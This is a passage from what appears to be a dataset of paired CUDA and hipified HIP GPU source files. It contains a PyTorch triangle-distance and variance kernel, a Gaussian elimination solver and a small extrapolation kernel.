line_variance_topk_cuda_abs(d1) + line_variance_topk_cuda_abs(d2); return dis; } template <typename scalar_t> __host__ __device__ scalar_t distance_point(scalar_t x1, scalar_t y1, scalar_t x, scalar_t y){ return line_variance_topk_cuda_abs(x - x1) + line_variance_topk_cuda_abs(y - y1); } template <typename scalar_t> __host__ __device__ void distance(scalar_t* ret, scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x3, scalar_t y3, scalar_t x, scalar_t y) { //https://en.wikipedia.org/wiki/Barycentric_coordinate_system scalar_t x1_x2 = x1 - x2; scalar_t y1_y2 = y1 - y2; scalar_t x1_x3 = x1 - x3; scalar_t y1_y3 = y1 - y3; scalar_t x2_x3 = x2 - x3; scalar_t y2_y3 = y2 - y3; scalar_t x_x1 = x - x1; scalar_t y_y1 = y - y1; scalar_t x_x2 = x - x2; scalar_t y_y2 = y - y2; scalar_t x_x3 = x - x3; scalar_t y_y3 = y - y3; scalar_t k1 = y2_y3 * x_x3 - x2_x3 * y_y3; scalar_t k2 = x1_x3 * y_y3 - y1_y3 * x_x3; scalar_t k3 = y2_y3 * x1_x3 - x2_x3 * y1_y3; if(k3 == 0){ // not a legal triangle ret[0] = -2; return; } if(k3 > 0){ // clock-wise triangle ret[0] = -1; return; } //scalar_t l1 = k1 / line_variance_topk_cuda_divide_non_zero(k3); //scalar_t l2 = k2 / line_variance_topk_cuda_divide_non_zero(k3); scalar_t l1 = k1 / k3; scalar_t l2 = k2 / k3; scalar_t l3 = 1 - l1 - l2; scalar_t dis12 = distance_line(x1, y1, x2, y2, x, y); scalar_t dis23 = distance_line(x2, y2, x3, y3, x, y); scalar_t dis13 = distance_line(x1, y1, x3, y3, x, y); if (l1 >= 0 && l2 >= 0 && l3 >= 0){ // lie inside or on the boundary scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); ret[0] = 0; ret[1] = min_dis_line; ret[2] = min_dis_line_idx; return; } // whether point can calculate distance to certain line bool within12 = ((y1_y2 * y_y1 + x_x1 * x1_x2) * (y1_y2 * y_y2 + x_x2 * x1_x2)) <= 0; bool within23 = ((y2_y3 * y_y3 + x_x3 * x2_x3) * (y2_y3 * y_y2 + x_x2 * x2_x3)) <= 0; bool within13 = ((y1_y3 * y_y1 + x_x1 * x1_x3) * (y1_y3 * y_y3 + x_x3 * x1_x3)) <= 0; dis12 = within12 ? dis12 : MAX_DIS; dis23 = within23 ? dis23 : MAX_DIS; dis13 = within13 ? dis13 : MAX_DIS; scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); scalar_t d1 = distance_point(x1, y1, x, y); scalar_t d2 = distance_point(x2, y2, x, y); scalar_t d3 = distance_point(x3, y3, x, y); scalar_t min_dis_point = line_variance_topk_cuda_min_dis(d1, d2, d3); scalar_t min_dis_point_idx = line_variance_topk_cuda_min_dis_idx(d1, d2, d3); if (min_dis_line < min_dis_point){ ret[0] = 1; ret[1] = min_dis_line; ret[2] = min_dis_line_idx; } else{ ret[0] = 2; ret[1] = min_dis_point; ret[2] = min_dis_point_idx; } } template <typename scalar_t> __global__ void line_variance_topk_cuda_forward_kernel_batch( const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_fea_bxnxd, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> grid_fea_bxkxd, const torch::PackedTensorAccessor<scalar_t, 4, torch::RestrictPtrTraits, size_t> grid_bxkx3x2, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_pos_bxnx2, torch::PackedTensorAccessor<scalar_t, 2, torch::RestrictPtrTraits, size_t> variance_bxn, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> reconstruct_bxnxd, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> topk_grid_bxnxk, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> buffer_bxnxk, int bnum, int n_pixel, int topk, int d_fea, float sigma) { // bidx * height + heiidx int presentthread = blockIdx.x * blockDim.x + threadIdx.x; int pixel_idx = presentthread % n_pixel; int bidx = (presentthread - pixel_idx) / n_pixel; if (bidx >= bnum || pixel_idx >= n_pixel) { return; } ///////////////////////////////////////////////////////////////// // which pixel it belongs to int total_idx = bidx * n_pixel * topk + pixel_idx * topk; scalar_t pixel_x = img_pos_bxnx2[bidx][pixel_idx][0]; scalar_t pixel_y = img_pos_bxnx2[bidx][pixel_idx][1]; scalar_t x0 = pixel_x * SCALE; scalar_t y0 = pixel_y * SCALE; scalar_t min_distance = 0.0; scalar_t find_sign = 0.0; scalar_t sum_exp = 0.0; scalar_t max_dist = -MAX_DIS; scalar_t ax, ay, bx, by, cx, cy; scalar_t condition; int img_pos_total_idx = bidx * n_pixel * 2 + pixel_idx * 2; scalar_t ret[3] = {0}; int grididx; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); ax = grid_bxkx3x2[bidx][grididx][0][0] * SCALE; ay = grid_bxkx3x2[bidx][grididx][0][1] * SCALE; bx = grid_bxkx3x2[bidx][grididx][1][0] * SCALE; by = grid_bxkx3x2[bidx][grididx][1][1] * SCALE; cx = grid_bxkx3x2[bidx][grididx][2][0] * SCALE; cy = grid_bxkx3x2[bidx][grididx][2][1] * SCALE; distance(ret, ax, ay, bx, by, cx, cy, x0, y0); condition = ret[0]; min_distance = ret[1]; if (condition < 0) { min_distance = - MAX_DIS; } else if (condition == 0 && find_sign == 0){ min_distance = min_distance / sigma; find_sign == 1; } else{ min_distance = - min_distance / sigma; } max_dist = max_dist > min_distance ? max_dist : min_distance; buffer_bxnxk[bidx][pixel_idx][k] = min_distance; } for (int k = 0; k < topk; k++){ buffer_bxnxk[bidx][pixel_idx][k] = expf(buffer_bxnxk[bidx][pixel_idx][k] - max_dist); sum_exp += buffer_bxnxk[bidx][pixel_idx][k]; } scalar_t variance = 0.0; scalar_t grid_f = 0.0; scalar_t pixel_f = 0.0; scalar_t diff = 0.0; scalar_t w = 0.0; scalar_t difference = 0.0; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); int in_sign = 0; if(buffer_bxnxk[bidx][pixel_idx][k] == 1){ in_sign = 1; } buffer_bxnxk[bidx][pixel_idx][k] = buffer_bxnxk[bidx][pixel_idx][k] / (sum_exp + 1e-15); w = buffer_bxnxk[bidx][pixel_idx][k]; difference = 0.0; for (int d = 0; d < d_fea; d++){ grid_f = grid_fea_bxkxd[bidx][grididx][d]; pixel_f = img_fea_bxnxd[bidx][pixel_idx][d]; reconstruct_bxnxd[bidx][pixel_idx][d] += w * grid_f; diff = line_variance_topk_cuda_square(grid_f - pixel_f); difference = difference + diff; } variance = variance + w * difference; if(in_sign == 1){ //hard variance for upsample buffer_bxnxk[bidx][pixel_idx][k] = difference; } else{ buffer_bxnxk[bidx][pixel_idx][k] = 0; } } variance_bxn[bidx][pixel_idx] = variance; } void line_variance_topk_cuda_forward_batch(at::Tensor img_fea_bxnxd, at::Tensor grid_fea_bxkxd, at::Tensor grid_bxkx3x2, at::Tensor img_pos_bxnx2, at::Tensor variance_bxn, float sigma, at::Tensor reconstruct_bxnxd, at::Tensor topk_grid_bxnxk, at::Tensor buffer_bxnxk){ int bnum = grid_bxkx3x2.size(0); int n_pixel = img_pos_bxnx2.size(1); int d_fea = img_fea_bxnxd.size(2); int topk = topk_grid_bxnxk.size(2); // for fxbxhxw image size const int threadnum = 512; const int totalthread = bnum * n_pixel; const int blocknum = totalthread / threadnum + 1; const dim3 threads(threadnum, 1, 1); const dim3 blocks(blocknum, 1, 1); AT_DISPATCH_FLOATING_TYPES(grid_bxkx3x2.type(), "line_variance_topk_cuda_forward_batch", ([&] { hipLaunchKernelGGL(( line_variance_topk_cuda_forward_kernel_batch<scalar_t>), dim3(blocks), dim3(threads), 0, 0, img_fea_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_fea_bxkxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_bxkx3x2.packed_accessor<scalar_t, 4, torch::RestrictPtrTraits, size_t>(), img_pos_bxnx2.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), variance_bxn.packed_accessor<scalar_t, 2, torch::RestrictPtrTraits, size_t>(), reconstruct_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), topk_grid_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), buffer_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), bnum, n_pixel, topk, d_fea, sigma); })); }
95d164da8469151c12074541f08d60ecdebe4aed.cu
#include <ATen/ATen.h> #include <cuda.h> #include <cuda_runtime.h> #include <assert.h> #include <THC/THC.h> #include <vector> #include <torch/torch.h> #include <torch/extension.h> #define eps 1e-10 #define SCALE 1.0 #define MAX_DIS 9999999999.0 //extern THCState * state; template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_abs(scalar_t a){ if (a > 0.0){ return a; } else{ return -a; } } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_square(scalar_t a){ return a * a; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_divide_non_zero(scalar_t a){ if (a == 0){ return eps; } if (a < 0){ return a - eps; } if (a > 0){ return a + eps; } return eps; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; if (b < min_d){ min_d = b; } if (c < min_d){ min_d = c; } return min_d; } template<typename scalar_t> __host__ __device__ scalar_t line_variance_topk_cuda_min_dis_idx(scalar_t a, scalar_t b, scalar_t c){ scalar_t min_d = a; int min_idx = 0; if (b < min_d){ min_d = b; min_idx = 1; } if (c < min_d){ min_d = c; min_idx = 2; } return min_idx; } template <typename scalar_t> __host__ __device__ scalar_t distance_line(scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x, scalar_t y){ scalar_t dx1x2 = -x1 + x2; scalar_t dy1y2 = -y1 + y2; scalar_t dx1x = x - x1; scalar_t dy1y = y - y1; scalar_t c1 = - x * x1 + x * x2 + x1 * x1 - x1 * x2 - y * y1 + y * y2 + y1 * y1 - y1 * y2; scalar_t c2 = x1 * x1 - 2 * x1 * x2 + x2 * x2 + y1 * y1 - 2 * y1 * y2 + y2 * y2; scalar_t d1 = -dx1x + dx1x2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t d2 = -dy1y + dy1y2 * c1 / line_variance_topk_cuda_divide_non_zero(c2); scalar_t dis = line_variance_topk_cuda_abs(d1) + line_variance_topk_cuda_abs(d2); return dis; } template <typename scalar_t> __host__ __device__ scalar_t distance_point(scalar_t x1, scalar_t y1, scalar_t x, scalar_t y){ return line_variance_topk_cuda_abs(x - x1) + line_variance_topk_cuda_abs(y - y1); } template <typename scalar_t> __host__ __device__ void distance(scalar_t* ret, scalar_t x1, scalar_t y1, scalar_t x2, scalar_t y2, scalar_t x3, scalar_t y3, scalar_t x, scalar_t y) { //https://en.wikipedia.org/wiki/Barycentric_coordinate_system scalar_t x1_x2 = x1 - x2; scalar_t y1_y2 = y1 - y2; scalar_t x1_x3 = x1 - x3; scalar_t y1_y3 = y1 - y3; scalar_t x2_x3 = x2 - x3; scalar_t y2_y3 = y2 - y3; scalar_t x_x1 = x - x1; scalar_t y_y1 = y - y1; scalar_t x_x2 = x - x2; scalar_t y_y2 = y - y2; scalar_t x_x3 = x - x3; scalar_t y_y3 = y - y3; scalar_t k1 = y2_y3 * x_x3 - x2_x3 * y_y3; scalar_t k2 = x1_x3 * y_y3 - y1_y3 * x_x3; scalar_t k3 = y2_y3 * x1_x3 - x2_x3 * y1_y3; if(k3 == 0){ // not a legal triangle ret[0] = -2; return; } if(k3 > 0){ // clock-wise triangle ret[0] = -1; return; } //scalar_t l1 = k1 / line_variance_topk_cuda_divide_non_zero(k3); //scalar_t l2 = k2 / line_variance_topk_cuda_divide_non_zero(k3); scalar_t l1 = k1 / k3; scalar_t l2 = k2 / k3; scalar_t l3 = 1 - l1 - l2; scalar_t dis12 = distance_line(x1, y1, x2, y2, x, y); scalar_t dis23 = distance_line(x2, y2, x3, y3, x, y); scalar_t dis13 = distance_line(x1, y1, x3, y3, x, y); if (l1 >= 0 && l2 >= 0 && l3 >= 0){ // lie inside or on the boundary scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); ret[0] = 0; ret[1] = min_dis_line; ret[2] = min_dis_line_idx; return; } // whether point can calculate distance to certain line bool within12 = ((y1_y2 * y_y1 + x_x1 * x1_x2) * (y1_y2 * y_y2 + x_x2 * x1_x2)) <= 0; bool within23 = ((y2_y3 * y_y3 + x_x3 * x2_x3) * (y2_y3 * y_y2 + x_x2 * x2_x3)) <= 0; bool within13 = ((y1_y3 * y_y1 + x_x1 * x1_x3) * (y1_y3 * y_y3 + x_x3 * x1_x3)) <= 0; dis12 = within12 ? dis12 : MAX_DIS; dis23 = within23 ? dis23 : MAX_DIS; dis13 = within13 ? dis13 : MAX_DIS; scalar_t min_dis_line = line_variance_topk_cuda_min_dis(dis12, dis23, dis13); scalar_t min_dis_line_idx = line_variance_topk_cuda_min_dis_idx(dis12, dis23, dis13); scalar_t d1 = distance_point(x1, y1, x, y); scalar_t d2 = distance_point(x2, y2, x, y); scalar_t d3 = distance_point(x3, y3, x, y); scalar_t min_dis_point = line_variance_topk_cuda_min_dis(d1, d2, d3); scalar_t min_dis_point_idx = line_variance_topk_cuda_min_dis_idx(d1, d2, d3); if (min_dis_line < min_dis_point){ ret[0] = 1; ret[1] = min_dis_line; ret[2] = min_dis_line_idx; } else{ ret[0] = 2; ret[1] = min_dis_point; ret[2] = min_dis_point_idx; } } template <typename scalar_t> __global__ void line_variance_topk_cuda_forward_kernel_batch( const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_fea_bxnxd, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> grid_fea_bxkxd, const torch::PackedTensorAccessor<scalar_t, 4, torch::RestrictPtrTraits, size_t> grid_bxkx3x2, const torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> img_pos_bxnx2, torch::PackedTensorAccessor<scalar_t, 2, torch::RestrictPtrTraits, size_t> variance_bxn, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> reconstruct_bxnxd, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> topk_grid_bxnxk, torch::PackedTensorAccessor<scalar_t, 3, torch::RestrictPtrTraits, size_t> buffer_bxnxk, int bnum, int n_pixel, int topk, int d_fea, float sigma) { // bidx * height + heiidx int presentthread = blockIdx.x * blockDim.x + threadIdx.x; int pixel_idx = presentthread % n_pixel; int bidx = (presentthread - pixel_idx) / n_pixel; if (bidx >= bnum || pixel_idx >= n_pixel) { return; } ///////////////////////////////////////////////////////////////// // which pixel it belongs to int total_idx = bidx * n_pixel * topk + pixel_idx * topk; scalar_t pixel_x = img_pos_bxnx2[bidx][pixel_idx][0]; scalar_t pixel_y = img_pos_bxnx2[bidx][pixel_idx][1]; scalar_t x0 = pixel_x * SCALE; scalar_t y0 = pixel_y * SCALE; scalar_t min_distance = 0.0; scalar_t find_sign = 0.0; scalar_t sum_exp = 0.0; scalar_t max_dist = -MAX_DIS; scalar_t ax, ay, bx, by, cx, cy; scalar_t condition; int img_pos_total_idx = bidx * n_pixel * 2 + pixel_idx * 2; scalar_t ret[3] = {0}; int grididx; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); ax = grid_bxkx3x2[bidx][grididx][0][0] * SCALE; ay = grid_bxkx3x2[bidx][grididx][0][1] * SCALE; bx = grid_bxkx3x2[bidx][grididx][1][0] * SCALE; by = grid_bxkx3x2[bidx][grididx][1][1] * SCALE; cx = grid_bxkx3x2[bidx][grididx][2][0] * SCALE; cy = grid_bxkx3x2[bidx][grididx][2][1] * SCALE; distance(ret, ax, ay, bx, by, cx, cy, x0, y0); condition = ret[0]; min_distance = ret[1]; if (condition < 0) { min_distance = - MAX_DIS; } else if (condition == 0 && find_sign == 0){ min_distance = min_distance / sigma; find_sign == 1; } else{ min_distance = - min_distance / sigma; } max_dist = max_dist > min_distance ? max_dist : min_distance; buffer_bxnxk[bidx][pixel_idx][k] = min_distance; } for (int k = 0; k < topk; k++){ buffer_bxnxk[bidx][pixel_idx][k] = expf(buffer_bxnxk[bidx][pixel_idx][k] - max_dist); sum_exp += buffer_bxnxk[bidx][pixel_idx][k]; } scalar_t variance = 0.0; scalar_t grid_f = 0.0; scalar_t pixel_f = 0.0; scalar_t diff = 0.0; scalar_t w = 0.0; scalar_t difference = 0.0; for (int k = 0; k < topk; k++){ grididx = __float2int_rn(topk_grid_bxnxk[bidx][pixel_idx][k]); int in_sign = 0; if(buffer_bxnxk[bidx][pixel_idx][k] == 1){ in_sign = 1; } buffer_bxnxk[bidx][pixel_idx][k] = buffer_bxnxk[bidx][pixel_idx][k] / (sum_exp + 1e-15); w = buffer_bxnxk[bidx][pixel_idx][k]; difference = 0.0; for (int d = 0; d < d_fea; d++){ grid_f = grid_fea_bxkxd[bidx][grididx][d]; pixel_f = img_fea_bxnxd[bidx][pixel_idx][d]; reconstruct_bxnxd[bidx][pixel_idx][d] += w * grid_f; diff = line_variance_topk_cuda_square(grid_f - pixel_f); difference = difference + diff; } variance = variance + w * difference; if(in_sign == 1){ //hard variance for upsample buffer_bxnxk[bidx][pixel_idx][k] = difference; } else{ buffer_bxnxk[bidx][pixel_idx][k] = 0; } } variance_bxn[bidx][pixel_idx] = variance; } void line_variance_topk_cuda_forward_batch(at::Tensor img_fea_bxnxd, at::Tensor grid_fea_bxkxd, at::Tensor grid_bxkx3x2, at::Tensor img_pos_bxnx2, at::Tensor variance_bxn, float sigma, at::Tensor reconstruct_bxnxd, at::Tensor topk_grid_bxnxk, at::Tensor buffer_bxnxk){ int bnum = grid_bxkx3x2.size(0); int n_pixel = img_pos_bxnx2.size(1); int d_fea = img_fea_bxnxd.size(2); int topk = topk_grid_bxnxk.size(2); // for fxbxhxw image size const int threadnum = 512; const int totalthread = bnum * n_pixel; const int blocknum = totalthread / threadnum + 1; const dim3 threads(threadnum, 1, 1); const dim3 blocks(blocknum, 1, 1); AT_DISPATCH_FLOATING_TYPES(grid_bxkx3x2.type(), "line_variance_topk_cuda_forward_batch", ([&] { line_variance_topk_cuda_forward_kernel_batch<scalar_t><<<blocks, threads>>>( img_fea_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_fea_bxkxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), grid_bxkx3x2.packed_accessor<scalar_t, 4, torch::RestrictPtrTraits, size_t>(), img_pos_bxnx2.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), variance_bxn.packed_accessor<scalar_t, 2, torch::RestrictPtrTraits, size_t>(), reconstruct_bxnxd.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), topk_grid_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), buffer_bxnxk.packed_accessor<scalar_t, 3, torch::RestrictPtrTraits, size_t>(), bnum, n_pixel, topk, d_fea, sigma); })); }
824e226fb231e99a30725919ac302f8808d3c088.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include "cmath" #include <omp.h> using namespace std; #define N 11 #define THREADS_PER_BLOCK 1024 double* create1DArray(); double* malloc_matrix(const int a, const int b) { return (double*)malloc(sizeof(double*) * a * b); } void print(double* mat) { printf("Below is the matrix of linear equation: \n"); int k = 0; for (int i = 0; i < N; i++, printf("\n")) for (int j = 0; j <= N; j++) { printf("%lf ", mat[k]); k++; } printf("\n"); } void printSolution(double* x) { printf("\nSolution for the system:\n"); for (int i = 0; i < N; i++) { int k = (i + 1) * (N + 1); printf("%lf\n", x[k - 1]); } } __global__ void replace_zero_gpu(double* AB, int rows, int columns, int column) { if (fabs(AB[column * columns + column]) <= 1e-4) { int row = column; for (; row < rows; row++) { if (fabs(AB[row * columns + column]) > 1e-4) break; } int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId + column >= columns) return; int zero = column * columns + column + threadId; int chosen = row * columns + column + threadId; AB[zero] += AB[chosen]; } } __global__ void column_elimination_gpu(double* AB, int rows, int columns, int column) { int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId >= (rows - 1 - column) * (columns - column)) return; int el_row = column + threadId / (columns - column) + 1; int el_col = column + threadId % (columns - column); int el = el_col + el_row * columns; int upper_el = el_col + column * columns; int main_el = column + column * columns; int main2_el = column + el_row * columns; double f = AB[main2_el] / AB[main_el]; AB[el] -= f * AB[upper_el]; } __global__ void multiple_column(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; AB[(threadId * columns) + row] *= AB[columns * (row + 1) - 1]; } __global__ void reverse_row_elimination(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int cols = columns - 2 - row; int start_index = row * columns + row + 1; int j = cols % 2; for (int i = cols / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[start_index + threadId] += (AB[start_index + threadId + i + j]); AB[start_index + threadId + i + j] = 0; if (j == 1) i++; j = i % 2; __syncthreads(); } int x_el = (row + 1) * columns - 1; int diag_el = row * columns + row; if (diag_el + 1 != x_el) { AB[x_el] -= AB[diag_el + 1]; AB[diag_el + 1] = 0.0; } AB[x_el] /= AB[diag_el]; AB[diag_el] = 1.0; } __global__ void sum_row(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int j = columns % 2; for (int i = columns / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[threadId] += AB[threadId + i + j]; __syncthreads(); if (j == 1) i++; j = i % 2; } } void start_gaussian_elimination_gpu(double* AB, int rows, int cols) { hipEvent_t start, stop; hipEventCreate(&start); hipEventCreate(&stop); double* AB_gpu; hipMalloc(&AB_gpu, sizeof(double) * rows * cols); hipMemcpy(AB_gpu, (void*)AB, sizeof(double) * rows * cols, hipMemcpyHostToDevice); hipEventRecord(start); for (int column = 0; column < cols - 1; column++) { replace_zero_gpu << <1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); hipDeviceSynchronize(); column_elimination_gpu << < 1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); hipDeviceSynchronize(); } for (int row = rows - 1; row >= 0; row--) { reverse_row_elimination << <1, cols >> > (AB_gpu, rows, cols, row); multiple_column << <1, row >> > (AB_gpu, rows, cols, row); hipDeviceSynchronize(); } hipMemcpy(AB, (void*)AB_gpu, sizeof(double) * rows * cols, hipMemcpyDeviceToHost); hipFree(AB_gpu); hipEventRecord(stop); hipEventSynchronize(stop); float milliseconds = 0; hipEventElapsedTime(&milliseconds, start, stop); printf("Effective Bandwidth (GB/s): %.11fn", milliseconds / 1000); } int main(int argc, char** argv) { int size = N; srand(124); double* AB = create1DArray(); print(AB); start_gaussian_elimination_gpu(AB, size, size + 1); printf("\n\n"); printSolution(AB); return 0; } double* create1DArray() { double* matrix_ab = malloc_matrix(N, N + 1); int k = 0; for (int i = 0; i < N; i++) { for (int j = 0; j < N + 1; j++) { matrix_ab[k] = rand() % 5; if (i == j) { matrix_ab[k] *= -1; } k++; } } return matrix_ab; }
824e226fb231e99a30725919ac302f8808d3c088.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include <stdlib.h> #include "cmath" #include <omp.h> using namespace std; #define N 11 #define THREADS_PER_BLOCK 1024 double* create1DArray(); double* malloc_matrix(const int a, const int b) { return (double*)malloc(sizeof(double*) * a * b); } void print(double* mat) { printf("Below is the matrix of linear equation: \n"); int k = 0; for (int i = 0; i < N; i++, printf("\n")) for (int j = 0; j <= N; j++) { printf("%lf ", mat[k]); k++; } printf("\n"); } void printSolution(double* x) { printf("\nSolution for the system:\n"); for (int i = 0; i < N; i++) { int k = (i + 1) * (N + 1); printf("%lf\n", x[k - 1]); } } __global__ void replace_zero_gpu(double* AB, int rows, int columns, int column) { if (fabs(AB[column * columns + column]) <= 1e-4) { int row = column; for (; row < rows; row++) { if (fabs(AB[row * columns + column]) > 1e-4) break; } int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId + column >= columns) return; int zero = column * columns + column + threadId; int chosen = row * columns + column + threadId; AB[zero] += AB[chosen]; } } __global__ void column_elimination_gpu(double* AB, int rows, int columns, int column) { int threadId = blockDim.x * blockIdx.x + threadIdx.x; if (threadId >= (rows - 1 - column) * (columns - column)) return; int el_row = column + threadId / (columns - column) + 1; int el_col = column + threadId % (columns - column); int el = el_col + el_row * columns; int upper_el = el_col + column * columns; int main_el = column + column * columns; int main2_el = column + el_row * columns; double f = AB[main2_el] / AB[main_el]; AB[el] -= f * AB[upper_el]; } __global__ void multiple_column(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; AB[(threadId * columns) + row] *= AB[columns * (row + 1) - 1]; } __global__ void reverse_row_elimination(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int cols = columns - 2 - row; int start_index = row * columns + row + 1; int j = cols % 2; for (int i = cols / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[start_index + threadId] += (AB[start_index + threadId + i + j]); AB[start_index + threadId + i + j] = 0; if (j == 1) i++; j = i % 2; __syncthreads(); } int x_el = (row + 1) * columns - 1; int diag_el = row * columns + row; if (diag_el + 1 != x_el) { AB[x_el] -= AB[diag_el + 1]; AB[diag_el + 1] = 0.0; } AB[x_el] /= AB[diag_el]; AB[diag_el] = 1.0; } __global__ void sum_row(double* AB, int rows, int columns, int row) { int threadId = threadIdx.x; int j = columns % 2; for (int i = columns / 2; i > 0; i /= 2) { if (threadId >= i) return; AB[threadId] += AB[threadId + i + j]; __syncthreads(); if (j == 1) i++; j = i % 2; } } void start_gaussian_elimination_gpu(double* AB, int rows, int cols) { cudaEvent_t start, stop; cudaEventCreate(&start); cudaEventCreate(&stop); double* AB_gpu; cudaMalloc(&AB_gpu, sizeof(double) * rows * cols); cudaMemcpy(AB_gpu, (void*)AB, sizeof(double) * rows * cols, cudaMemcpyHostToDevice); cudaEventRecord(start); for (int column = 0; column < cols - 1; column++) { replace_zero_gpu << <1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); cudaThreadSynchronize(); column_elimination_gpu << < 1, THREADS_PER_BLOCK >> > (AB_gpu, rows, cols, column); cudaThreadSynchronize(); } for (int row = rows - 1; row >= 0; row--) { reverse_row_elimination << <1, cols >> > (AB_gpu, rows, cols, row); multiple_column << <1, row >> > (AB_gpu, rows, cols, row); cudaThreadSynchronize(); } cudaMemcpy(AB, (void*)AB_gpu, sizeof(double) * rows * cols, cudaMemcpyDeviceToHost); cudaFree(AB_gpu); cudaEventRecord(stop); cudaEventSynchronize(stop); float milliseconds = 0; cudaEventElapsedTime(&milliseconds, start, stop); printf("Effective Bandwidth (GB/s): %.11fn", milliseconds / 1000); } int main(int argc, char** argv) { int size = N; srand(124); double* AB = create1DArray(); print(AB); start_gaussian_elimination_gpu(AB, size, size + 1); printf("\n\n"); printSolution(AB); return 0; } double* create1DArray() { double* matrix_ab = malloc_matrix(N, N + 1); int k = 0; for (int i = 0; i < N; i++) { for (int j = 0; j < N + 1; j++) { matrix_ab[k] = rand() % 5; if (i == j) { matrix_ab[k] *= -1; } k++; } } return matrix_ab; }
6050d0fc68af3fafb31a81652395bf8815ae1492.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "includes.h" __global__ void extrapolate(float* xbar, float* xcur, float* xn, float theta, int w, int h, int nc) { int x = threadIdx.x + blockDim.x * blockIdx.x; int y = threadIdx.y + blockDim.y * blockIdx.y; if (x < w && y < h) { int i; for (int z = 0; z < nc; z++) { i = x + w * y + w * h * z; xbar[i] = xn[i] + theta * (xn[i] - xcur[i]); xcur[i] = xn[i]; } } }
6050d0fc68af3fafb31a81652395bf8815ae1492.cu
#include "includes.h" __global__ void extrapolate(float* xbar, float* xcur, float* xn, float theta, int w, int h, int nc) { int x = threadIdx.x + blockDim.x * blockIdx.x; int y = threadIdx.y + blockDim.y * blockIdx.y; if (x < w && y < h) { int i; for (int z = 0; z < nc; z++) { i = x + w * y + w * h * z; xbar[i] = xn[i] + theta * (xn[i] - xcur[i]); xcur[i] = xn[i]; } } }
4635c217850a2677bcccfc05c6966018029a2443.hip
